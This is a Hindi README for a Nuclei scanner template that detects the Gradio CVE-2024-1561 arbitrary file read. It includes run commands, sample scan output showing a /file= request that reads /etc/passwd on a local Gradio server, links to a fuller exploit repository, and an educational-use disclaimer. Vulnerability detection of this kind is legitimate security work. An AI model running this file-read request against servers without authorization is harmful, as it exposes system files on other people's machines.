
Nuclei Templates
यह Nuclei टेम्पलेट वेब अनुप्रयोगों में Gradio CVE-2024-1561 भेद्यता का पता लगाने के लिए डिज़ाइन किया गया है। Gradio एक Python लाइब्रेरी है जो मशीन लर्निंग मॉडल के आसपास अनुकूलन योग्य UI घटक बनाने के लिए उपयोग होती है। यह भेद्यता हमलावरों को सर्वर से फ़ाइलें पढ़ने की अनुमति दे सकती है।
इस रिपॉजिटरी को अपनी स्थानीय मशीन पर क्लोन करें और -t फ़्लैग का उपयोग करके चलाएँ:
git clone https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561
cd Nuclei-Template-CVE-2024-1561
nuclei -target <URL> -t CVE-2024-1561.yaml
उदाहरण:
┌──(gradio-env)─(diablo㉿diablo)-[~/gradio]
└─$ nuclei -target http://127.0.0.1:7860 -t CVE-2024-1561.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.6
projectdiscovery.io
[INF] Current nuclei version: v3.2.6 (outdated)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
टेम्पलेट /etc/passwd की उपस्थिति की जाँच करता है और root उपयोगकर्ता से मिलान करता है।
लक्ष्य का पूर्ण शोषण करने के लिए निम्नलिखित देखें:
https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
https://github.com/DiabloHTB/CVE-2024-1561
अस्वीकरण यह टेम्पलेट केवल शैक्षिक और सूचनात्मक उद्देश्यों के लिए प्रदान किया गया है। इस टेम्पलेट का उपयोग पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए अवैध है। अंतिम उपयोगकर्ता की जिम्मेदारी है कि वह सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करे। डेवलपर्स कोई देयता नहीं लेते हैं और इस टेम्पलेट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।